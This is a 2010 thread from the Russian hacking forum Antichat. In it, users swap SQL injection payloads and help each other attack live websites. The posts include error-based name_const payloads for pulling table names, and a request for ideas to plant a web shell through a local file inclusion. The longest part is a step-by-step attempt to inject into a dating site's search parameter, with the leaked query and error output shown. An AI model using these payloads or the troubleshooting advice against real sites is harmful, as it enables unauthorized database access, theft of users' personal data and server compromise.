ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.10.2010, 11:37
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
site.com/2.php?id=6+or(1,2)=(select*from(select name_const((select table_name from information_schema.tables limit 17,1),1),name_const((select table_name from information_schema.tables limit 17,1),1))a)
or
site.com/2.php?id=6 union select * from(select * from(select name_const((select table_name from information_schema.tables limit 17,1), 11)d) as t join (select name_const((select table_name from information_schema.tables limit 17,1), 11)e) b)a
|
|
|
17.10.2010, 17:45
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
Имеется локальный инклуд. С нул байтом. Цель - залить шелл.
На портале нет ни форума, ни блога - там где можна залить какую либо картинку и потом ее приинклудить. Нужна помощь... подкиньте идейку, как заинклудить шелл)
|
|
|
|
17.10.2010, 19:43
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
http://www.xakep.ru/post/49508/default.asp
|
|
|
|
17.10.2010, 19:56
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
уже два дня мучаюсь ((, тут как поступит?
Привожу варианты:
http://site.net/script.php?seeking_sex=1'
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2' OR user_master.seeking_sexuality like '%,2' OR user_mas' at line 13
Сообщение от None
SELECT distinct user_master.user_master_id, user_master.user_nickname, user_master.user_image, user_master.protected_image, user_master.explicit_image, user_master.r_rated_image, user_master.mark_as_logout, user_master.user_postcode, user_master.user_state, user_master.user_city, user_master.user_profile_title, user_master.user_description, user_master.seeking_description, user_master.user_maritial_status, user_master.profile_avg_rate, user_master.profile_rate_voter, user_master.seeking_sexuality, user_master.user_registered_as, user_master.email_verified, user_master_detail.user_profession, user_master.last_login, DATE_FORMAT(FROM_DAYS(TO_DAYS(NOW()) - TO_DAYS(user_master_detail.user_dob)), '%y') AS age FROM user_master INNER JOIN user_master_detail on(user_master_detail.user_master_id = user_master.user_master_id) WHERE user_master.user_show_profile_in_search='Y' and is_deleted_user_profile = 'N' AND user_master.user_master_id<>'0' AND user_master.is_new='N' AND (which_site_user = '2' OR which_site_user = '11') AND ( user_master.user_registered_as = '1'' ) AND (user_master.seeking_sexuality like '2' OR user_master.seeking_sexuality like '%,2' OR user_master.seeking_sexuality like '2,%' OR user_master.seeking_sexuality like '%,2,%' ) AND user_master.user_state='12' AND ( (DATE_FORMAT(FROM_DAYS(TO_DAYS(NOW()) - TO_DAYS(user_master_detail.user_dob)), '%y') BETWEEN 18 AND 100)) GROUP BY user_master.user_master_id order by user_master.last_login desc, user_master.created_date desc LIMIT 0, 6
http://site.net/script.php?seeking_sex=1')
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ) AND (user_master.seeking_sexuality like '2' OR user_master.seekin' at line 13
http://site.net/script.php?seeking_sex=1' order by 1--
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order b' ) AND (user_master.seeking_sexuality like '2' OR user_master' at line 13
тут одинаков ответ:
http://site.net/script.php?seeking_sex=1') order by 1--
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ) AND (user_master.seeking_sexuality like '2' OR user_master.seekin' at line 13
http://site.net/script.php?seeking_sex=1') order by 1000--
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ) AND (user_master.seeking_sexuality like '2' OR user_master.seekin' at line 13
тока на:
http://site.net/script.php?seeking_sex=1'' order by 1--
норм стр
но на:
http://site.net/script.php?seeking_sex=1'' order by 1000--
ответ тоже норм стр ((
Как можно решит тут? floor не помог
Заранее благодарен
PS. линк не палил |
|
|
|
17.10.2010, 22:18
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Многострочный запроc, а вы режете --, используйте /*.
Если не прокатит /*, то в уязвимый параметр 1') and ('1'='1.
Ну и тудо же впихнуть разные вариции всего известного чтоб вытащить в ошибку | пытатцо сделать принтабельной.
|
|
|
|
18.10.2010, 00:23
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от Strilo4ka
Strilo4ka said:
Многострочный запроc, а вы режете
--
, используйте
/*
.
Если не прокатит
/*
, то в уязвимый параметр
1') and ('1'='1
.
Ну и тудо же впихнуть разные вариции всего известного чтоб вытащить в ошибку | пытатцо сделать принтабельной.
спс
пробовал так:
http://site.net/script.php?seeking_sex=1') and ('1'='1+order by 1/*
без ошибок но и без профилей
а так:
http://site.net/script.php?seeking_sex=-1') and ('1'='1+order by 1/*
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2' OR user_master.seeking_sexuality like '%,2' OR user_mas' at line 13
http://site.net/script.php?seeking_sex=-1') OR ('1'='1+order by 1/*
без ошибок но и без профилей
что то не получится чтол
|
|
|
|
18.10.2010, 01:01
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
YuNi|[c гадать трудно, думаю линк помог бы быстрее решить проблему
|
|
|
|
18.10.2010, 02:46
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от Konqi
Konqi said:
YuNi|[c гадать трудно, думаю линк помог бы быстрее решить проблему
ну линк в студию просто убет его ))
Отправил в пм
|
|
|
|
18.10.2010, 20:09
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
В одном сайте при бронирование номера вылез такое дело:
Сообщение от None
Символьные или двоичные данные могут быть усечены.~|~exec renesans.dbo.BronJPrepareSitePublic @UIDTD=62503, @UIDTDError=58600, @UIDSiteGenerate=2808866;
Это уязвимость ? (и вообше что это такое? ) |
|
|
|
18.10.2010, 20:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
2060
Репутация:
0
|
|
А такое как раскрутить
http://steroidman.ru/dle_haki/page/999999999999999999
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
